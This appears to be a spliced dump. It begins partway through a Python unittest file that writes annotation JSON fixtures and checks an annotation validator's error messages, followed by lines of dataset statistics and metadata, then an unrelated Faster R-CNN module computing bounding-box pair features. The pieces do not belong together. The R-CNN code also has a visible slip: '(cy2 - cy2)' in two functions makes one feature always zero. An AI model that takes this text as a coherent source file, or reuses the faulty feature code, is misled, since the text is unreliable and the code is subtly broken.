"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"type": "bad_type",
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": 7083022,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
}
],
"tags": [
"some tag"
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_invalid_instace_type_and_attr_annotation.json"))
self.assertIn("instances[2].meta.typeinvalidtype,validtypesarebbox,event",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_invalid_instace_without_type_and_attr_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_invalid_instace_without_type_and_attr_annotation.json",
"w") as test_validate_video_invalid_instace_without_type_and_attr_annotation:
test_validate_video_invalid_instace_without_type_and_attr_annotation.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": {
"3": "point label bro"
},
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": 7083022,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
}
],
"tags": [
"some tag"
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_invalid_instace_without_type_and_attr_annotation.json"))
self.assertIn("instances[2].meta.typefieldrequired", out.getvalue().strip().replace(" ", ""))
def test_validate_vector_temlpate_polygon_polyline_min_annotation(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_vector_temlpate_polygon_polyline_min_annotation.json",
"w") as test_validate_vector_temlpate_polygon_polyline_min_annotation:
test_validate_vector_temlpate_polygon_polyline_min_annotation.write(
'''
{
"metadata": {
"lastAction": {
"email": "some@some.com",
"timestamp": 1636964198056
},
"width": "1234",
"height": 1540,
"name": "t.png",
"projectId": 164988,
"isPredicted": false,
"status": "Completed",
"pinned": false,
"annotatorEmail": null,
"qaEmail": null
},
"comments": [],
"tags": [],
"instances": [
{
"type": "template",
"classId": 880080,
"probability": 100,
"points": [
],
"connections": [
{
"id": 1,
"from": 1,
"to": 2
}
],
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"templateId": 4728,
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T08:24:40.712Z",
"createdBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:24:46.440Z",
"updatedBy": {
"email": "shab.prog@gmail.com",
"role": "Admin"
},
"className": "kj",
"templateName": "templ1"
},
{
"type": "polygon",
"classId": 880080,
"probability": 100,
"points": [
233.69
],
"groupId": 0,
"pointLabels": {},
"locked": true,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T08:18:16.103Z",
"createdBy": {
"email": "some@some.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:18:20.233Z",
"updatedBy": {
"email": "some@some.com",
"role": "Admin"
},
"className": "kj"
},
{
"type": "polyline",
"classId": 880080,
"probability": 100,
"points": [
218.22
],
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T08:18:06.203Z",
"createdBy": {
"email": "some@some.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:18:13.439Z",
"updatedBy": {
"email": "some@some.com",
"role": "Admin"
},
"className": "kj"
},
{
"type": "bbox",
"classId": 880080,
"probability": 100,
"points": {
"x1": 487.78,
"x2": 1190.87,
"y1": 863.91,
"y2": 1463.78
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": true,
"attributes": [],
"trackingId": null,
"error": null,
"createdAt": "2021-11-15T06:43:09.812Z",
"createdBy": {
"email": "some@some.com",
"role": "Admin"
},
"creationType": "Manual",
"updatedAt": "2021-11-15T08:16:48.807Z",
"updatedBy": {
"email": "some@some.com",
"role": "Admin"
},
"className": "kj"
}
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Vector", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_vector_temlpate_polygon_polyline_min_annotation.json"))
self.assertEqual(
"metadata.widthintegertypeexpected\ninstances[0].pointsensurethisvaluehasatleast1items\ninstances[1].pointsensurethisvaluehasatleast3items\ninstances[2].pointsensurethisvaluehasatleast2items",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_point_labels(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_point_labels.json",
"w") as test_validate_video_point_labels:
test_validate_video_point_labels.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": "bad_point_label",
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"type": "event",
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": 7083022,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
}
],
"tags": [
"some tag"
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_point_labels.json"))
self.assertIn(
"instances[0].meta.pointLabelsvalueisnotavaliddict",
out.getvalue().strip().replace(" ", ""))
def test_validate_video_point_labels_bad_keys(self):
with tempfile.TemporaryDirectory() as tmpdir_name:
with open(f"{tmpdir_name}/test_validate_video_point_labels_bad_keys.json",
"w") as test_validate_video_point_labels_bad_keys:
test_validate_video_point_labels_bad_keys.write(
'''
{
"metadata": {
"name": "video.mp4",
"width": 480,
"height": 270,
"status": "NotStarted",
"url": "https://file-examples-com.github.io/uploads/2017/04/file_example_MP4_480_1_5MG.mp4",
"duration": 30526667,
"projectId": 152038,
"error": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"pointLabels": {
"bad_key_1" : "a",
"bad_key_2" : "b",
" " : "afsd",
"1" : ["fasdf","sdfsdf"]
},
"start": 0,
"end": 30526667
},
"parameters": [
{
"start": 0,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 223.32,
"y1": 78.45,
"x2": 312.31,
"y2": 176.66
},
"timestamp": 0,
"attributes": []
},
{
"points": {
"x1": 182.08,
"y1": 33.18,
"x2": 283.45,
"y2": 131.39
},
"timestamp": 17271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.32,
"y1": 36.33,
"x2": 284.01,
"y2": 134.54
},
"timestamp": 18271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 45.09,
"x2": 283.18,
"y2": 143.3
},
"timestamp": 19271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"type": "event",
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022,
"pointLabels": {}
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": "7083022",
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": "7083022",
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": "afsdfadsf"
},
{
"meta" : []
}
],
"tags": [
123
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_point_labels_bad_keys.json"))
self.assertEqual(
"instances[0].meta.pointLabels.bad_key_1doesnotmatchexpectedformat^[0-9]+$\ninstances[0].meta.pointLabels.bad_key_2doesnotmatchexpectedformat^[0-9]+$\ninstances[0].meta.pointLabels.doesnotmatchexpectedformat^[0-9]+$\ninstances[0].meta.pointLabels.1strtypeexpected\ninstances[2].meta.pointLabelsextrafieldsnotpermitted\ninstances[2].parameters[0].timestamps[2].timestampintegertypeexpected\ninstances[3].metafieldrequired\ninstances[4].metavalueisnotavaliddict\ninstances[5].metavalueisnotavaliddict\ntags[0]strtypeexpected",
out.getvalue().strip().replace(" ", ""))
| 51.041339
| 544
| 0.221567
| 4,304
| 103,716
| 5.182388
| 0.093169
| 0.036046
| 0.042591
| 0.058283
| 0.91002
| 0.883389
| 0.858373
| 0.846581
| 0.820534
| 0.794082
| 0
| 0.12345
| 0.702196
| 103,716
| 2,031
| 545
| 51.06647
| 0.598698
| 0
| 0
| 0.484848
| 0
| 0.013468
| 0.335666
| 0.203917
| 0
| 0
| 0
| 0
| 0.074074
| 1
| 0.084175
| false
| 0
| 0.03367
| 0.006734
| 0.148148
| 0.043771
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
541f563557f6ecd72d9f9322643666a415388f59
| 8,112
|
py
|
Python
|
branch1/lib/model/rpn/edge_box_layer_tf.py
|
ChengZY/Train_Defect_Detection
|
2e9dc0e63c04f4fddb599b4d473bd509c4acf021
|
[
"MIT"
] | 23
|
2019-02-08T01:40:08.000Z
|
2022-03-18T02:22:22.000Z
|
branch1/lib/model/rpn/edge_box_layer_tf.py
|
ChengZY/Train_Defect_Detection
|
2e9dc0e63c04f4fddb599b4d473bd509c4acf021
|
[
"MIT"
] | null | null | null |
branch1/lib/model/rpn/edge_box_layer_tf.py
|
ChengZY/Train_Defect_Detection
|
2e9dc0e63c04f4fddb599b4d473bd509c4acf021
|
[
"MIT"
] | 4
|
2019-02-12T07:46:13.000Z
|
2021-08-31T04:59:47.000Z
|
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
import numpy as np
import math
import torch
DEBUG = False
def cal_iou(box, truth):
xmin = max(box[1], truth[1])
ymin = max(box[2], truth[2])
xmax = min(box[3], truth[3])
ymax = min(box[4], truth[4])
w = xmax - xmin + 1
h = ymax - ymin + 1
if w < 0 or h < 0:
inter_s = 0
else:
inter_s = w * h
outer_s = (box[3] - box[1]+1) * (box[4] - box[2]+1) + (truth[3] - truth[1]+1) * (truth[4] - truth[2]+1)
# if outer_s - inter_s == 0:
# iou = 0
# else:
iou = inter_s * 1.0 / (outer_s - inter_s)
return iou
def edge_box_layer(rois, im_info):
"""
Assign anchors to ground-truth targets. Produces anchor classification
labels and bounding-box regression targets.
"""
# n_boxes = len(rois) # 128, 256
n_boxes = rois.size()[1] # 128, 256
# allow boxes to sit over the edge by a small amount
# _allowed_border = 0
# map of shape (..., H, W)
# height, width = rpn_cls_score.shape[1:3]
# print ">>>>>>>>>>>>>>>>>>>>>>>>union_boxes"
# print ">>>>>>>>>>>>>>>>>>>>>>>>",len(rois)
rois = rois.tolist()
im_info = im_info.tolist()
union_boxes = []
rois = rois[0]
im_info = im_info[0]
# print im_info
for i in range(n_boxes):
for j in range(n_boxes):
if i == j:
iou = 1.0
else:
iou = cal_iou(rois[i], rois[j])
if iou < 0.6:
box = []
cx1 = (rois[i][1] + rois[i][3]) * 0.5
cy1 = (rois[i][2] + rois[i][4]) * 0.5
w1 = (rois[i][3] - rois[i][1]) * 1.0
h1 = (rois[i][4] - rois[i][2]) * 1.0
# cx1 = (rois[:,i,1] + rois[:,i,3]) * 0.5
# cy1 = (rois[:,i,2] + rois[:,i,4]) * 0.5
# w1 = (rois[:,i,3] - rois[:,i,1]) * 1.0
# h1 = (rois[:,i,4] - rois[:,i,2]) * 1.0
if w1 < 0:
w1 = 0
if h1 < 0:
h1 = 0
s1 = w1 * h1
cx2 = (rois[j][1] + rois[j][3]) * 0.5
cy2 = (rois[j][2] + rois[j][4]) * 0.5
w2 = (rois[j][3] - rois[j][1]) * 1.0
h2 = (rois[j][4] - rois[j][2]) * 1.0
# cx2 = (rois[:,j,1] + rois[:,j,3]) * 0.5
# cy2 = (rois[:,j,2] + rois[:,j,4]) * 0.5
# w2 = (rois[:,j,3] - rois[:,j,1]) * 1.0
# h2 = (rois[:,j,4] - rois[:,j,2]) * 1.0
if w2 < 0:
w2 = 0
if h2 < 0:
h2 = 0
s2 = w2 * h2
box.append(w1 / (im_info[0] + 1))
box.append(h1 / (im_info[1] + 1))
box.append(s1 / ((im_info[0] + 1) * (im_info[1] + 1)))
box.append(w2 / (im_info[0] + 1))
box.append(h2 / (im_info[1] + 1))
box.append(s2 / ((im_info[0] + 1) * (im_info[1] + 1)))
box.append((cx1 - cx2) / (w2 + 1))
box.append((cy1 - cy2) / (h2 + 1))
box.append(pow((cx1 - cx2) / (w2 + 1), 2))
box.append(pow((cy2 - cy2) / (h2 + 1), 2))
box.append(math.log((w1 + 1) / (w2 + 1)))
box.append(math.log((h1 + 1) / (h2 + 1)))
else:
box = [0] * 12
# index += 1
union_boxes.append(box)
edge_boxes = np.array(union_boxes).astype(np.float32)
return edge_boxes
def edge_whole_layer(rois, im_info):
"""
Assign anchors to ground-truth targets. Produces anchor classification
labels and bounding-box regression targets.
"""
# n_boxes = len(rois) # 128, 256
n_boxes = rois.size()[1] # 128, 256
# allow boxes to sit over the edge by a small amount
# _allowed_border = 0
# map of shape (..., H, W)
# height, width = rpn_cls_score.shape[1:3]
# print ">>>>>>>>>>>>>>>>>>>>>>>>union_boxes"
# print ">>>>>>>>>>>>>>>>>>>>>>>>",len(rois)
rois = rois.tolist()
im_info = im_info.tolist()
union_boxes = []
rois = rois[0]
im_info = im_info[0]
# print im_info
for i in range(n_boxes):
box = []
cx1 = (rois[i][1] + rois[i][3]) * 0.5
cy1 = (rois[i][2] + rois[i][4]) * 0.5
w1 = (rois[i][3] - rois[i][1]) * 1.0
h1 = (rois[i][4] - rois[i][2]) * 1.0
# cx1 = (rois[:,i,1] + rois[:,i,3]) * 0.5
# cy1 = (rois[:,i,2] + rois[:,i,4]) * 0.5
# w1 = (rois[:,i,3] - rois[:,i,1]) * 1.0
# h1 = (rois[:,i,4] - rois[:,i,2]) * 1.0
if w1 < 0:
w1 = 0
if h1 < 0:
h1 = 0
s1 = w1 * h1
cx2 = (im_info[0]) * 0.5
cy2 = (im_info[1]) * 0.5
w2 = (im_info[0]) * 1.0
h2 = (im_info[1]) * 1.0
# cx2 = (rois[:,j,1] + rois[:,j,3]) * 0.5
# cy2 = (rois[:,j,2] + rois[:,j,4]) * 0.5
# w2 = (rois[:,j,3] - rois[:,j,1]) * 1.0
# h2 = (rois[:,j,4] - rois[:,j,2]) * 1.0
if w2 < 0:
w2 = 0
if h2 < 0:
h2 = 0
s2 = w2 * h2
box.append(w1 / (im_info[0] + 1))
box.append(h1 / (im_info[1] + 1))
box.append(s1 / ((im_info[0] + 1) * (im_info[1] + 1)))
box.append((cx1 - cx2) / (w2 + 1))
box.append((cy1 - cy2) / (h2 + 1))
box.append(pow((cx1 - cx2) / (w2 + 1), 2))
box.append(pow((cy2 - cy2) / (h2 + 1), 2))
box.append(math.log((w1 + 1) / (w2 + 1)))
box.append(math.log((h1 + 1) / (h2 + 1)))
union_boxes.append(box)
edge_boxes = np.array(union_boxes).astype(np.float32)
return edge_boxes
def edge_whole_layer_0(rois, im_info):
"""
Assign anchors to ground-truth targets. Produces anchor classification
labels and bounding-box regression targets.
"""
# n_boxes = len(rois) # 128, 256
n_boxes = rois.size()[0] # 128, 256
# allow boxes to sit over the edge by a small amount
# _allowed_border = 0
# map of shape (..., H, W)
# height, width = rpn_cls_score.shape[1:3]
# print ">>>>>>>>>>>>>>>>>>>>>>>>union_boxes"
# print ">>>>>>>>>>>>>>>>>>>>>>>>",len(rois)
rois = rois.tolist()
im_info = im_info.tolist()
union_boxes = []
# rois = rois[0]
im_info = im_info[0]
# print im_info
for i in range(n_boxes):
box = []
cx1 = (rois[i][1] + rois[i][3]) * 0.5
cy1 = (rois[i][2] + rois[i][4]) * 0.5
w1 = (rois[i][3] - rois[i][1]) * 1.0
h1 = (rois[i][4] - rois[i][2]) * 1.0
# cx1 = (rois[:,i,1] + rois[:,i,3]) * 0.5
# cy1 = (rois[:,i,2] + rois[:,i,4]) * 0.5
# w1 = (rois[:,i,3] - rois[:,i,1]) * 1.0
# h1 = (rois[:,i,4] - rois[:,i,2]) * 1.0
if w1 < 0:
w1 = 0
if h1 < 0:
h1 = 0
s1 = w1 * h1
cx2 = (im_info[0]) * 0.5
cy2 = (im_info[1]) * 0.5
w2 = (im_info[0]) * 1.0
h2 = (im_info[1]) * 1.0
# cx2 = (rois[:,j,1] + rois[:,j,3]) * 0.5
# cy2 = (rois[:,j,2] + rois[:,j,4]) * 0.5
# w2 = (rois[:,j,3] - rois[:,j,1]) * 1.0
# h2 = (rois[:,j,4] - rois[:,j,2]) * 1.0
if w2 < 0:
w2 = 0
if h2 < 0:
h2 = 0
s2 = w2 * h2
box.append(w1 / (im_info[0] + 1))
box.append(h1 / (im_info[1] + 1))
box.append(s1 / ((im_info[0] + 1) * (im_info[1] + 1)))
box.append((cx1 - cx2) / (w2 + 1))
box.append((cy1 - cy2) / (h2 + 1))
box.append(pow((cx1 - cx2) / (w2 + 1), 2))
box.append(pow((cy1 - cy2) / (h2 + 1), 2))
box.append(math.log((w1 + 1) / (w2 + 1)))
box.append(math.log((h1 + 1) / (h2 + 1)))
union_boxes.append(box)
edge_boxes = np.array(union_boxes).astype(np.float32)
return edge_boxes
